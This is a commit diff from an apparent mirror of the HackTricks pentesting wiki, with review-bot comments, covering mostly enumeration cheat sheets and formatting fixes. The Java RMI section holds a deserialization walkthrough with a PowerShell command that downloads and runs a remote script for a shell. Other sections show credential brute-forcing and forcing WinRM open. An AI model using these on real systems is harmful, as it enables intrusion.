mirror of https://github.com/carlospolop/hacktricks.git synced 2023-12-14 19:12:55 +01:00

GitBook: [master] 26 pages and 20 assets modified

This commit is contained in:
CPol 2021-08-14 10:42:47 +00:00 committed by gitbook-bot
parent 05d94fa10e
commit 136ac552bb
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
39 changed files with 163 additions and 70 deletions

[Binary image assets under .gitbook/assets were added or modified in this commit (not shown): several files of 40 KiB, 142 KiB and 1.3 MiB, and one of 740 KiB.]

@ -1437,6 +1437,7 @@ Files that ships in packages downloaded from distribution repository go into `/u
#### **Best tool to look for Linux local privilege escalation vectors:** [**LinPEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS)
**LinEnum**: [https://github.com/rebootuser/LinEnum](https://github.com/rebootuser/LinEnum)\(-t option\)
**Enumy**: [https://github.com/luke-goddard/enumy](https://github.com/luke-goddard/enumy)
**Unix Privesc Check:** [http://pentestmonkey.net/tools/audit/unix-privesc-check](http://pentestmonkey.net/tools/audit/unix-privesc-check)
**Linux Priv Checker:** [www.securitysift.com/download/linuxprivchecker.py](http://www.securitysift.com/download/linuxprivchecker.py)
**BeeRoot:** [https://github.com/AlessandroZ/BeRoot/tree/master/Linux](https://github.com/AlessandroZ/BeRoot/tree/master/Linux)
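Review bot: the last entry's label is misspelled: the link target is `.../AlessandroZ/BeRoot/...`, so the bold label should read **BeRoot**, not **BeeRoot**. The LinPEAS line also mixes a `####` heading with a bold link label while the other five tools are plain lines; consider formatting all six the same way so the list renders consistently.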


@ -304,7 +304,7 @@ An **ASEP** is a location on the system that could lead to the **execution** of
* `/System/Library/LaunchAgents`: Per-user agents provided by Apple.
* `/System/Library/LaunchDaemons`: System-wide daemons provided by Apple.
When a user logs in the plists located in `/Users/$USER/Library/LaunchAgents` are started with the **logged users permissions**.
When a user logs in the plists located in `/Users/$USER/Library/LaunchAgents` and `/Users/$USER/Library/LaunchDemons` are started with the **logged users permissions**.
The **main difference between agents and daemons is that agents are loaded when the user logs in and the daemons are loaded at system startup** \(as there are services like ssh that needs to be executed before any user access the system\). Also agents may use GUI while daemons need to run in the background.
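Review bot: the new line introduces `/Users/$USER/Library/LaunchDemons`, which is spelled inconsistently with the `LaunchDaemons` used in the context lines just above, and launchd does not read a per-user daemons directory: daemons come only from `/Library/LaunchDaemons` and `/System/Library/LaunchDaemons`, and the very next sentence in this hunk says daemons are loaded at system startup, not at login. Suggest dropping the added path and keeping only `/Users/$USER/Library/LaunchAgents`; while here, "logged users permissions" should read "logged-in user's permissions".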
@ -874,28 +874,95 @@ You can enable/disable these services in "System Preferences" --> Sharing
* **Apple Remote Desktop** \(ARD\), or “Remote Management”
* **AppleEvent**, known as “Remote Apple Event”
## Specific MacOS Enumeration
## Specific MacOS Commands
```bash
smbutil statshares -a #View smb shares mounted to the hard drive
#System info
date
cal
uptime #show time from starting
w #list users
whoami #this user
finger username #info about user
uname -a #sysinfo
cat /proc/cpuinfo #processor
cat /proc/meminfo #memory
free #check memory
df #check disk
launchctl list #List services
atq #List "at" tasks for the user
mdfind password #Show all the files that contains the word password
mfind -name password #List all the files containing the word password in the name
sysctl -a #List kernel configuration
diskutil list #List connected hard drives
nettop #Monitor network usage of processes in top style
#networksetup - set or view network options: Proxies, FW options and more
#Searches
mdfind password #Show all the files that contains the word password
mfind -name password #List all the files containing the word password in the name
#Open any app
open -a <Application Name> --hide #Open app hidden
open some.doc -a TextEdit #Open a file in one application
#Computer doesn't go to sleep
caffeinate &
#system_profiler
system_profiler --help #This command without arguments take lot of memory and time.
system_profiler -listDataTypes
system_profiler SPSoftwareDataType SPNetworkDataType
#Network
arp -i en0 -l -a #Print the macOS device's ARP table
lsof -i -P -n | grep LISTEN
smbutil statshares -a #View smb shares mounted to the hard drive
##networksetup - set or view network options: Proxies, FW options and more
networksetup -listallnetworkservices #List network services
networksetup -listallhardwareports #Hardware ports
networksetup -getinfo Wi-Fi #Wi-Fi info
networksetup -getautoproxyurl Wi-Fi #Get proxy URL for Wifi
networksetup -getwebproxy Wi-Fi #Wifi Web proxy
networksetup -getftpproxy Wi-Fi #Wifi ftp proxy
#Brew
brew list #List installed
brew search <text> #Search package
brew info <formula>
brew install <formula>
brew uninstall <formula>
brew cleanup #Remove older versions of installed formulae.
brew cleanup <formula> #Remove older versions of specified formula.
#Make the machine talk
say hello -v diego
#spanish: diego, Jorge, Monica
#mexican: Juan, Paulina
#french: Thomas, Amelie
############ High privileges actions
sudo purge #purge RAM
#Sharing preferences
sudo launchctl load -w /System/Library/LaunchDaemons/ssh.plist (enable ssh)
sudo launchctl unload /System/Library/LaunchDaemons/ssh.plist (disable ssh)
#Start apache
sudo apachectl (start|status|restart|stop)
##Web folder: /Library/WebServer/Documents/
#Remove DNS cache
dscacheutil -flushcache
sudo killall -HUP mDNSResponder
```
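Review bot: several added commands are Linux-only and fail on macOS, which is what this block is for: there is no `/proc`, so `cat /proc/cpuinfo` and `cat /proc/meminfo` should become e.g. `sysctl -n machdep.cpu.brand_string` and `sysctl hw.memsize`, and `free` does not exist (use `vm_stat`). `mfind -name password` appears twice and should be `mdfind -name password`. `smbutil statshares -a`, the `mdfind`/`mfind` pair and the `networksetup` comment are each duplicated inside the block; keep one copy of each. Finally, inside a `bash` fence the trailing `(enable ssh)` and `(disable ssh)` on the two `launchctl` lines are not comments and are a syntax error if pasted; prefix them with `#`.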
## References
* [https://taomm.org/vol1/analysis.html](https://taomm.org/vol1/analysis.html)
* [https://github.com/NicolasGrimonpont/Cheatsheet](https://github.com/NicolasGrimonpont/Cheatsheet)


@ -378,6 +378,12 @@ cat procs.txt
Or use `netstat` or `lsof`
### More Fuzzing MacOS Info
* [https://github.com/bnagy/slides/blob/master/OSXScale.pdf](https://github.com/bnagy/slides/blob/master/OSXScale.pdf)
* [https://github.com/bnagy/francis/tree/master/exploitaben](https://github.com/bnagy/francis/tree/master/exploitaben)
* [https://github.com/ant4g0nist/crashwrangler](https://github.com/ant4g0nist/crashwrangler)
## References
* [https://www.youtube.com/watch?v=T5xfL9tEg44](https://www.youtube.com/watch?v=T5xfL9tEg44)


@ -115,7 +115,7 @@ The response is a JSON dictionary with some important data like:
* Signed using the **device identity certificate \(from APNS\)**
* **Certificate chain** includes expired **Apple iPhone Device CA**
![](../../.gitbook/assets/image%20%28567%29%20%281%29%20%281%29.png)
![](../../.gitbook/assets/image%20%28567%29%20%281%29.png)
### Step 6: Profile Installation


@ -6,7 +6,7 @@
## Attacks Graphic
![](../../.gitbook/assets/image%20%28535%29%20%281%29%20%281%29%20%282%29%20%282%29%20%282%29%20%282%29%20%281%29.png)
![](../../.gitbook/assets/image%20%28535%29%20%281%29%20%281%29%20%282%29%20%282%29%20%282%29%20%282%29%20%282%29.png)
## Tool


@ -49,7 +49,7 @@ public class RmiServer extends UnicastRemoteObject implements RmiServerIntf {
//do nothing, error means registry already exists
System.out.println("java RMI registry already exists.");
}
//Instantiate RmiServer
RmiServer server = new RmiServer();
@ -96,11 +96,16 @@ RMI methods are usually interesting as a bunch of them will **deserialize the re
To execute remote methods, Java RMI clients submit a 64-bit hash of the method signature, which the server uses to identify the corresponding server-side method. These **hashes are computed** with the following logic:
1. **Source code** representation of the signature:
`void myRemoteMethod(int count, Object obj, boolean flag)`
`void myRemoteMethod(int count, Object obj, boolean flag)`
2. **Bytecode** representation of signature:
`myRemoteMethod(ILjava/lang/Object;Z)V`
`myRemoteMethod(ILjava/lang/Object;Z)V`
3. Method Hash: **big-endian representation of first 8 bytes of the SHA1 of the signature**:
`Hash = SHA1String(“myRemoteMethod(ILjava/lang/Object;Z)V”).substring(0,8).reverse()`
`Hash = SHA1String(“myRemoteMethod(ILjava/lang/Object;Z)V”).substring(0,8).reverse()`
As shown above, the information that is used to compute a method hash are: **the method name, the return types, and an ordered list of the fully qualified names of the parameters types**. Instead of brute-forcing the 64-bit keyspace, we can use wordlists for each of these categories to guess common signatures. Using [GitGot](https://labs.bishopfox.com/blog/gitgot-tool-release), I scraped GitHub for RMI interfaces in open source projects and found interesting patterns across the 15,000+ method signatures:
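Review bot: every changed line in this hunk appears as an identical old/new pair, which points to a whitespace-only change (most likely non-breaking spaces introduced by the editor); confirm that is intended rather than a sync artifact. While here, step 3 labels the hash "big-endian" but the formula ends in `.reverse()`, i.e. the first 8 SHA-1 bytes are read in reversed (little-endian) order; the label and the formula should say the same thing.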
@ -170,7 +175,6 @@ public String sayTest19(int paramInt) throws RemoteException;
public String sayTest19(List paramList1, List paramList2) throws RemoteException;
public String sayTest19(List[] paramArrayOfList, int paramInt) throws RemoteException;
public Object sayTest20(String paramString) throws RemoteException;
```
First lets look at the **`add(int,int)`** method. Since its **method name is unique**, the **generated stub** is simply the **method** **name**. The server compares the clients requested method \(`paramString` in the figure below\) against a string literal.
@ -218,7 +222,6 @@ if (paramString.equals("sayTest19__org_omg_boxedRMI_java_util_seq1_List__long"))
((org.omg.CORBA_2_3.portable.OutputStream)localObject9).write_value((Serializable)localObject7, String.class);
return (org.omg.CORBA.portable.OutputStream)localObject9;
}
```
And for **`sayTest20(String)`**, we again have a **unique method nam**e, but here we are **deserializing** a **`String`** class. In this case, the complex parameter allows us to **force a `ClassCastException` to allow identification without invocation**.
@ -268,7 +271,7 @@ We can still achieve arbitrary Java deserialization by replacing object or array
## HackTricks Automatic Commands
```
```text
Protocol_Name: Java-RMI #Protocol Abbreviation if there is one.
Port_Number: 1098 #Comma separated if there is more than one.
Protocol_Description: Java Remote Method Inclusion #Protocol Abbreviation Spelled out
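Review bot: `Protocol_Description: Java Remote Method Inclusion` expands RMI incorrectly; it is Remote Method Invocation. Also `Port_Number: 1098` disagrees with the page's own title (`1099-pentesting-java-rmi`), and the registry's default port is 1099; list the ports actually probed, e.g. `1099,1098`.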
@ -282,14 +285,14 @@ nmap -sC -sV -Pn 10.11.1.73 -p 1100
may dump the reg of the java-rmi instance. If this is the case the machine may be vulnerable to a deserializaion exploit.
BaRMIe.jar is the way to go to directly exploit this vulnerability.
https://github.com/NickstaDB/BaRMIe/releases/tag/v1.01 is where the latest build is hosted, pre-built
useage
java -jar BaRMIe_v1.01.jar -attack 10.11.1.73 1100
target select) 1
available attacks) 1 (illegal bind deserialization)
payloads) 1 (Apache Common Collections 3.1 worked for me, others may also work)
OS Command) powershell.exe -command "IEX(new-object net.webclient).downloadstring('http://192.168.119.167:80/3232.ps1')"
enjoy your system shell!
https://book.hacktricks.xyz/pentesting/1099-pentesting-java-rmi
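Review bot: typos in the context lines: `deserializaion` should be `deserialization`, `useage` should be `usage`, and `reg` should be spelled out as `registry`. The BaRMIe walkthrough also hardcodes a lab host (`10.11.1.73`) and a listener address (`192.168.119.167`) while the rest of the automatic-command block uses `{IP}` placeholders; use the placeholders so the template stays generic.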
@ -303,3 +306,4 @@ Name: Nmap register
Description: Dump register of java-rmi instance
Command: """nmap -sC -sV -Pn {IP} -p 1100"""
```


@ -70,7 +70,7 @@ identd.conf
## HackTricks Automatic Commands
```
```text
Protocol_Name: Ident #Protocol Abbreviation if there is one.
Port_Number: 113 #Comma separated if there is more than one.
Protocol_Description: Identification Protocol #Protocol Abbreviation Spelled out
@ -89,3 +89,4 @@ Note: """
apt install ident-user-enum ident-user-enum {IP} 22 23 139 445 (try all open ports)
"""
```
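Review bot: `apt install ident-user-enum ident-user-enum {IP} 22 23 139 445` runs two commands on one line with no separator, so `apt` would treat `ident-user-enum {IP} 22 23 139 445` as further package names; split it into `apt install ident-user-enum` and `ident-user-enum {IP} 22 23 139 445` on separate lines (or join them with `&&`).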


@ -19,7 +19,7 @@ When enumerating Oracle the first step is to talk to the TNS-Listener that usual
4. **Bruteforce credentials** for valid SID name discovered
5. Try to **execute code**
In order to user MSF oracle modules you need to install some dependencies: ****[**Installation**](oracle-pentesting-requirements-installation.md)\*\*\*\*
In order to user MSF oracle modules you need to install some dependencies: **\*\*\[**Installation_\*\]\(oracle-pentesting-requirements-installation.md\)\_\*\*\*
## Enumeration
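Review bot: the new version of the installation sentence breaks the link: `[**Installation**](oracle-pentesting-requirements-installation.md)` became `\[**Installation_\*\]\(oracle-pentesting-requirements-installation.md\)` with escaped brackets and parentheses, which GitBook renders as literal text rather than a link. The stray empty `****` markers around the link are what the sync re-escaped; remove them instead, leaving `[**Installation**](oracle-pentesting-requirements-installation.md)`. Also "In order to user MSF" should be "In order to use MSF".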
@ -103,7 +103,7 @@ pip3 install cx_Oracle --upgrade
**Got SID?** Excellent, now lets move to the next task and extract the user account information. From this point, you can connect to the listener and brute-force credentials.
**Metasploit** _****scanner/oracle/oracle\_login_ It has a built-in dictionary for the **most popular default values of user account** information presented as login:password. By the way, such default entries represent one of the most popular and serious security problems in Oracle.
**Metasploit** _\*\*scanner/oracle/oracle\_login_ It has a built-in dictionary for the **most popular default values of user account** information presented as login:password. By the way, such default entries represent one of the most popular and serious security problems in Oracle.
**Nmap** can also help here with the script _oracle-brute_. Note that this script **mixes the logins and passwords**, that is, it tries each login against every password, and it takes quite a while!
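Review bot: `_\*\*scanner/oracle/oracle\_login_` leaves a literal `\*\*` inside the italic span; the empty `****` that preceded the module name is the cause, so drop it and write `_scanner/oracle/oracle_login_`.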
@ -120,14 +120,14 @@ Below are some of the default passwords associated with Oracle:
Other **default passwords** can be found [here ](http://www.petefinnigan.com/default/oracle_default_passwords.htm)and [here](https://cirt.net/passwords?vendor=Oracle).
The versions 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2, and 11.2.0.3 are vulnerable to **offline brute force**. ****[**Read more about this technique here.**](remote-stealth-pass-brute-force.md)\*\*\*\*
The versions 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2, and 11.2.0.3 are vulnerable to **offline brute force**. **\*\*\[**Read more about this technique here._\*\]\(remote-stealth-pass-brute-force.md\)\_\*\*\*
### User/Pass bruteforce
Different tools offered **different user/pass lists** for oracle:
* **oscan:** _/usr/share/oscanner/accounts.default_ \(169 lines\)
* **MSF-1:** _from_ admin/oracle/oracle\_login __/usr/share/metasploit-framework/data/wordlists/oracle\_default\_passwords.csv \(598 lines\)
* **MSF-1:** _from_ admin/oracle/oracle\_login \_\_/usr/share/metasploit-framework/data/wordlists/oracle\_default\_passwords.csv \(598 lines\)
* **MSF-2:** _from scanner/oracle/oracle\_login_ _/usr/share/metasploit-framework/data/wordlists/oracle\_default\_userpass.txt_ \(568 lines\)
* **Nmap:** _/usr/share/nmap/nselib/data/oracle-default-accounts.lst_ \(687 lines\)
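Review bot: the same escaping problem appears twice in this hunk: the "Read more about this technique here" link becomes `\[**Read more about this technique here._\*\]\(remote-stealth-pass-brute-force.md\)` and no longer renders as a link, and the MSF-1 entry now carries a literal `\_\_` before the wordlist path. Remove the empty `****` and `__` markers rather than letting the sync escape them.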
@ -139,7 +139,7 @@ I have **mixed** all of them and **removed duplicates:**
### [Brute Force](../../brute-force.md#oraclesql)
Now, that you **know a valid SID and valid credentials**. To connect to the database you need the tool: _**sqlplus**_ and to install it you need to follow some steps:
Now, that you **know a valid SID and valid credentials**. To connect to the database you need the tool: _**sqlplus**_ and to install it you need to follow some steps:
[Installation](oracle-pentesting-requirements-installation.md)
@ -257,7 +257,7 @@ msf> use auxiliary/sqli/oracle/lt_findricset_cursor
If you want to practice attacking Oracle databases, the safest way is to register for the Oracle Developer Days Virtualbox VM:
{% embed url="http://www.oracle.com/technetwork/database/enterprise-edition/databaseappdev-vm-161299.html" %}
{% embed url="http://www.oracle.com/technetwork/database/enterprise-edition/databaseappdev-vm-161299.html" caption="" %}
Most part of the information in this post was extracted from: [https://medium.com/@netscylla/pentesters-guide-to-oracle-hacking-1dcf7068d573](https://medium.com/@netscylla/pentesters-guide-to-oracle-hacking-1dcf7068d573) and from [https://hackmag.com/uncategorized/looking-into-methods-to-penetrate-oracle-db/](https://hackmag.com/uncategorized/looking-into-methods-to-penetrate-oracle-db/)
@ -267,7 +267,7 @@ Other interesting **references**:
## HackTricks Automatic Commands
```
```text
Protocol_Name: Oracle #Protocol Abbreviation if there is one.
Port_Number: 1521 #Comma separated if there is more than one.
Protocol_Description: Oracle TNS Listener #Protocol Abbreviation Spelled out
@ -293,3 +293,4 @@ Name: Nmap
Description: Nmap with Oracle Scripts
Command: """nmap --script "oracle-tns-version" -p 1521 -T4 -sV {IP}"""
```


@ -2,7 +2,7 @@
## Basic Information
**WHOIS** \(pronounced as the phrase "who is"\) is a query and response protocol that is widely used for querying databases that store the registered users or assignees of an Internet resource, such as a domain name, an IP address block or an autonomous system, but is also used for a wider range of other information. \(From [here](https://en.wikipedia.org/wiki/WHOIS)\)
**WHOIS** \(pronounced as the phrase "who is"\) is a query and response protocol that is widely used for querying databases that store the registered users or assignees of an Internet resource, such as a domain name, an IP address block or an autonomous system, but is also used for a wider range of other information. \(From [here](https://en.wikipedia.org/wiki/WHOIS)\)
**Default port:** 43
@ -32,7 +32,7 @@ Also, the WHOIS service always needs to use a **database** to store and extract
## HackTricks Automatic Commands
```
```text
Protocol_Name: WHOIS #Protocol Abbreviation if there is one.
Port_Number: 43 #Comma separated if there is more than one.
Protocol_Description: WHOIS #Protocol Abbreviation Spelled out
@ -49,3 +49,4 @@ Name: Banner Grab
Description: Grab WHOIS Banner
Command: """whois -h {IP} -p 43 {Domain_Name} && echo {Domain_Name} | nc -vn {IP} 43"""
```


@ -1,9 +1,8 @@
# 5985,5986 - Pentesting WinRM
---
description: >-
https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/
---
description: &gt;-
## [https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-3-wmi-and-winrm/)
## WinRM
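Review bot: `description: &gt;-` carries an HTML entity into the Markdown source; the YAML folded-scalar marker is `>-`, and a bare `description:` line without the surrounding `---` fences is not front matter at all. The replacement `## [https://blog.ropnop.com/...](https://blog.ropnop.com/...)` is a heading whose only content is a link; either restore the original `---` / `description: >-` / `---` block or put the URL on a plain reference line.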
@ -24,12 +23,12 @@ We first have to configure our attack machine to work with WinRM as well. We nee
```text
Enable-PSRemoting -Force
Set-Item wsman:\localhost\client\trustedhosts *
Set-Item wsman:\localhost\client\trustedhosts *
```
This adds a wildcard to the trustedhosts setting. Be wary of what that entails. _Note: I also had to change the network type on my attack machine from "Public" to "Work" network._
You can also **activate** WinRM **remotely** _****_using _wmic_:
You can also **activate** WinRM **remotely** _\*\*\_using \_wmic_:
```text
wmic /node:<REMOTE_HOST> process call create "powershell enable-psremoting -force"
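Review bot: `_\*\*\_using \_wmic_` is another escaping artifact and will render with literal backslashes and asterisks; the sentence should read `You can also **activate** WinRM **remotely** using _wmic_:`. Separately, the `Set-Item wsman:\localhost\client\trustedhosts *` pair differs only in whitespace; the context already warns about the wildcard, and it is worth noting that `trustedhosts` accepts a comma-separated list so it can be scoped to the intended host instead of `*`.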
@ -58,7 +57,7 @@ Invoke-Command -computername computer-name.domain.tld -ScriptBlock {ipconfig /al
You can also **execute a command of your current PS console via** _**Invoke-Command**_. Suppose that you have locally a function called _**enumeration**_ and you want to **execute it in a remote computer**, you can do:
```ruby
Invoke-Command -ComputerName <computername> -ScriptBLock ${function:enumeration} [-ArgumentList "arguments"]
Invoke-Command -ComputerName <computername> -ScriptBLock ${function:enumeration} [-ArgumentList "arguments"]
```
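Review bot: the fence is tagged `ruby` but the content is PowerShell; tag it `powershell` so it highlights correctly. `-ScriptBLock` should be `-ScriptBlock` (PowerShell is case-insensitive, but the odd casing reads as a typo).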
### Execute a Script
@ -83,14 +82,14 @@ Enter-PSSession -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local [-Creden
![](../.gitbook/assets/image%20%2892%29.png)
**The session will run in a new process \(wsmprovhost\) inside the "victim"**
**The session will run in a new process \(wsmprovhost\) inside the "victim"**
### **Forcing WinRM Open**
### **Forcing WinRM Open**
If you really want to use PS Remoting and WinRM but the target isn't configured for it, you could "force" it on through a single command. I wouldn't recommend this but if you really wanted to use WinRM or PSRemoting than by all means do it this way. For example, using PSExec:
```text
PS C:\tools\SysinternalsSuite> .\PsExec.exe \\computername -u domain\username -p password -h -d powershell.exe "enable-psremoting -force"
PS C:\tools\SysinternalsSuite> .\PsExec.exe \\computername -u domain\username -p password -h -d powershell.exe "enable-psremoting -force"
```
Now we can enter a remote PS session on the victim.
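Review bot: the changed lines in this hunk are identical old/new pairs, so this is a whitespace-only change; confirm it is intended. In the context sentence, "than by all means" should read "then by all means".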
@ -236,7 +235,7 @@ end
## HackTricks Automatic Commands
```
```text
Protocol_Name: WinRM #Protocol Abbreviation if there is one.
Port_Number: 5985 #Comma separated if there is more than one.
Protocol_Description: Windows Remote Managment #Protocol Abbreviation Spelled out
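Review bot: `Windows Remote Managment` should be `Windows Remote Management`.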
@ -268,3 +267,4 @@ print(s.run_ps('ipconfig'))
https://book.hacktricks.xyz/pentesting/pentesting-winrm
"""
```


@ -72,7 +72,7 @@ To easily list, mount and change UID and GID to have access to files you can use
## HackTricks Automatic Commands
```
```text
Protocol_Name: NFS #Protocol Abbreviation if there is one.
Port_Number: 2049 #Comma separated if there is more than one.
Protocol_Description: Network File System #Protocol Abbreviation Spelled out
@ -85,7 +85,7 @@ It is a client/server system that allows users to access files across a network
#apt install nfs-common
showmount 10.10.10.180 ~or~showmount -e 10.10.10.180
should show you available shares (example /home)
mount -t nfs -o ver=2 10.10.10.180:/home /mnt/
cd /mnt
nano into /etc/passwd and change the uid (probably 1000 or 1001) to match the owner of the files if you are not able to get in
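Review bot: `showmount 10.10.10.180 ~or~showmount -e 10.10.10.180` uses an ad-hoc `~or~` separator inside a block meant to be pasted; put the two variants on separate lines, and note that `showmount` without `-e` lists clients that have mounted from the server, not exports, so only the `-e` form matches "should show you available shares". For `mount -t nfs -o ver=2`, nfs(5) documents the version option as `vers=` / `nfsvers=`, so check that `ver=2` is what was intended, and forcing v2 will fail against servers that only serve v3/v4. The example host `10.10.10.180` should also be `{IP}` like the rest of the template.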
@ -97,3 +97,4 @@ Name: Nmap
Description: Nmap with NFS Scripts
Command: """nmap --script=nfs-ls.nse,nfs-showmount.nse,nfs-status.nse -p 2049 {IP}"""
```


@ -194,7 +194,7 @@ named.conf
## HackTricks Automatic Commands
```
```text
Protocol_Name: DNS #Protocol Abbreviation if there is one.
Port_Number: 53 #Comma separated if there is more than one.
Protocol_Description: Domain Name Service #Protocol Abbreviation Spelled out
@ -210,11 +210,11 @@ dnsrecon -r {Network}{CIDR} -n {IP} -d {Domain_Name}
dig axfr @{IP}
dig axfr {Domain_Name} @{IP}
nslookup
SERVER {IP}
127.0.0.1
{IP}
Domain_Name
exit
SERVER {IP}
127.0.0.1
{IP}
Domain_Name
exit
https://book.hacktricks.xyz/pentesting/pentesting-dns
"""
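Review bot: in the interactive `nslookup` sequence, `Domain_Name` is missing the braces that every other placeholder uses (`{IP}`), so it would be sent to the server literally; write `{Domain_Name}`. The five duplicated lines indicate a whitespace-only change, worth confirming.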
@ -235,3 +235,4 @@ Name: Active Directory
Description: Eunuerate a DC via DNS
Command: dig -t _gc._{Domain_Name} && dig -t _ldap._{Domain_Name} && dig -t _kerberos._{Domain_Name} && dig -t _kpasswd._{Domain_Name} && nmap --script dns-srv-enum --script-args "dns-srv-enum.domain={Domain_Name}"
```
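Review bot: `dig -t _gc._{Domain_Name}` passes the name where `dig` expects a record type (`-t TYPE name`), so all four `dig` calls are malformed as written; the SRV lookups should be of the form `dig -t SRV _gc._tcp.{Domain_Name}`, `dig -t SRV _ldap._tcp.{Domain_Name}`, `dig -t SRV _kerberos._tcp.{Domain_Name}` and `dig -t SRV _kpasswd._tcp.{Domain_Name}`. Also `Eunuerate` should be `Enumerate`.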


@ -186,7 +186,7 @@ proftpd.conf
## HackTricks Automatic Commands
```
```text
Protocol_Name: FTP #Protocol Abbreviation if there is one.
Port_Number: 21 #Comma separated if there is more than one.
Protocol_Description: File Transfer Protocol #Protocol Abbreviation Spelled out
@ -224,3 +224,4 @@ Note: """
ftp://anonymous:anonymous@{IP}
"""
```


@ -97,8 +97,6 @@ apt install evolution
![](../.gitbook/assets/image%20%28477%29.png)
### CURL
Basic navigation is possible with [CURL](https://ec.haxx.se/usingcurl/usingcurl-reademail#imap), but the documentation is light on details so checking the [source](https://github.com/curl/curl/blob/master/lib/imap.c) is recommended for precise details.
@ -162,7 +160,7 @@ done
## HackTricks Automatic Commands
```
```text
Protocol_Name: IMAP #Protocol Abbreviation if there is one.
Port_Number: 143,993 #Comma separated if there is more than one.
Protocol_Description: Internet Message Access Protocol #Protocol Abbreviation Spelled out
@ -183,3 +181,4 @@ Name: Secure Banner Grab
Description: Banner Grab 993
Command: """openssl s_client -connect {IP}:993 -quiet"""
```


@ -24,13 +24,13 @@ PORT STATE SERVICE
Simply stated, the vulnerability enables an attacker to modify an existing, valid, domain user logon token \(Kerberos Ticket Granting Ticket, TGT, ticket\) by adding the false statement that the user is a member of Domain Admins \(or other sensitive group\) and the Domain Controller \(DC\) will validate that \(false\) claim enabling attacker improper access to any domain \(in the AD forest\) resource on the network.
{% embed url="https://adsecurity.org/?p=541" %}
{% embed url="https://adsecurity.org/?p=541" caption="" %}
Other exploits: [https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek)
## HackTricks Automatic Commands
```
```text
Protocol_Name: Kerberos #Protocol Abbreviation if there is one.
Port_Number: 88 #Comma separated if there is more than one.
Protocol_Description: AD Domain Authentication #Protocol Abbreviation Spelled out
@ -61,3 +61,4 @@ Note: """
https://rootsecdev.medium.com/installing-impacket-on-kali-linux-2020-1d9ad69d10bb GetUserSPNs.py -request -dc-ip {IP} active.htb/svc_tgs
"""
```
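Review bot: the Note field runs an install-guide URL and the `GetUserSPNs.py -request -dc-ip {IP} active.htb/svc_tgs` command together on one line; separate them, and replace the lab-specific `active.htb/svc_tgs` with placeholders such as `{Domain_Name}/{Username}` to match the rest of the template.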


@ -342,7 +342,7 @@ You can feed john with the password hash \(from '{SSHA}' to 'structural' without
## HackTricks Automatic Commands
```
```text
Protocol_Name: LDAP #Protocol Abbreviation if there is one.
Port_Number: 389,636 #Comma separated if there is more than one.
Protocol_Description: Lightweight Directory Access Protocol #Protocol Abbreviation Spelled out
@ -371,3 +371,4 @@ Name: LdapSearch Big Dump
Description: Need Naming Context to do big dump
Command: ldapsearch -h {IP} -x -b "{Naming_Context}"
```
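Review bot: `ldapsearch -h {IP}` uses the `-h` host option, which is deprecated in current OpenLDAP clients in favour of a URI; prefer `ldapsearch -H ldap://{IP} -x -b "{Naming_Context}"`.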


@ -221,7 +221,7 @@ You probably will be able to escalate to Administrator using this token: [Juicy-
## HackTricks Automatic Commands
```
```text
Protocol_Name: MSSQL #Protocol Abbreviation if there is one.
Port_Number: 1433 #Comma separated if there is more than one.
Protocol_Description: Microsoft SQL Server #Protocol Abbreviation Spelled out
@ -268,3 +268,4 @@ Name: Nmap for SQL
Description: Nmap with SQL Scripts
Command: """nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 {IP}"""
```


@ -3,7 +3,7 @@
## **Basic Information**
**MySQL** is a freely available open source Relational Database Management System \(RDBMS\) that uses Structured Query Language \(**SQL**\).
_\*\*_From [here](https://www.siteground.com/tutorials/php-mysql/mysql/).
\_\*\*\_From [here](https://www.siteground.com/tutorials/php-mysql/mysql/).
**Default port:** 3306
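Review bot: `\_\*\*\_From [here](...)` is an escaping artifact: the stray empty `_**_` markers were re-escaped by the sync and will render as literal backslashes and asterisks. The line should simply read `From [here](https://www.siteground.com/tutorials/php-mysql/mysql/).`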
@ -546,7 +546,7 @@ x$waits\_global\_by\_latency
## HackTricks Automatic Commands
```
```text
Protocol_Name: MySql #Protocol Abbreviation if there is one.
Port_Number: 3306 #Comma separated if there is more than one.
Protocol_Description: MySql #Protocol Abbreviation Spelled out
@ -567,3 +567,4 @@ Name: MySql
Description: Attempt to connect to mysql server
Command: """mysql -h {IP} -u {Username}@localhost"""
```
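Review bot: `mysql -h {IP} -u {Username}@localhost` passes the literal string `{Username}@localhost` as the account name; the mysql client takes only the user name in `-u`, and the host part of the account is decided by the server from where the connection originates. Use `mysql -h {IP} -u {Username} -p`.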


@ -2,7 +2,7 @@
## Basic Information
The Network Time Protocol \(**NTP**\) is a networking protocol for clock synchronization between computer systems over packet-switched, variable-latency data networks.
The Network Time Protocol \(**NTP**\) is a networking protocol for clock synchronization between computer systems over packet-switched, variable-latency data networks.
**Default port:** 123/udp
@ -49,7 +49,7 @@ ntpdc -n -c monlist <IP>
## HackTricks Automatic Commands
```
```text
Protocol_Name: NTP #Protocol Abbreviation if there is one.
Port_Number: 123 #Comma separated if there is more than one.
Protocol_Description: Network Time Protocol #Protocol Abbreviation Spelled out
@ -66,3 +66,4 @@ Name: Nmap
Description: Enumerate NTP
Command: """nmap -sU -sV --script "ntp* and (discovery or vuln) and not (dos or brute)" -p 123 {IP}"""
```


@ -83,7 +83,7 @@ root@kali:~# telnet $ip 110
## HackTricks Automatic Commands
```
```text
Protocol_Name: POP #Protocol Abbreviation if there is one.
Port_Number: 110 #Comma separated if there is more than one.
Protocol_Description: Post Office Protocol #Protocol Abbreviation Spelled out
@ -109,3 +109,4 @@ Name: Nmap
Description: Scan for POP info
Command: nmap --scripts "pop3-capabilities or pop3-ntlm-info" -sV -port 110 {IP}
```
